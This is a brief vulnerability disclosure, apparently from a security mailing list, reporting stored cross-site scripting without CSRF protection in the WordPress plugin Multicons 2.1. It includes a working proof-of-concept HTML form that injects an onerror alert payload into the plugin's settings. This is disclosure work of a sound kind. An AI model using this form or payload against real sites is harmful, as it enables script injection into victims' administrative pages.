Subject: Persistent Cross-Site Scripting (XSS) in Multicons 2.1
Date: Tue, 25 Aug 2015 14:10:33 +0200

Hello,

Plugin: Multicons 2.1 https://wordpress.org/plugins/multicons/

1. Persistent Cross-Site Scripting (XSS) 

Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).

Method: POST
Url: http://localhost/wp-admin/options-general.php?page=multicons%2Fmulticons.php
Vulnerable parameters: global_url, admin_url, etc...

Example PHP callstack:
personal_setup_page   [/multicons/multicons.php:86]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=multicons%2Fmulticons.php" />
<input type="text" name="global_url" value='"><img src=x onerror=alert(1) />' />
<input type="text" name="update" value='1' />
<input type="submit" name="submit" />
</form>
--


--
Regards,
Marcin Probola,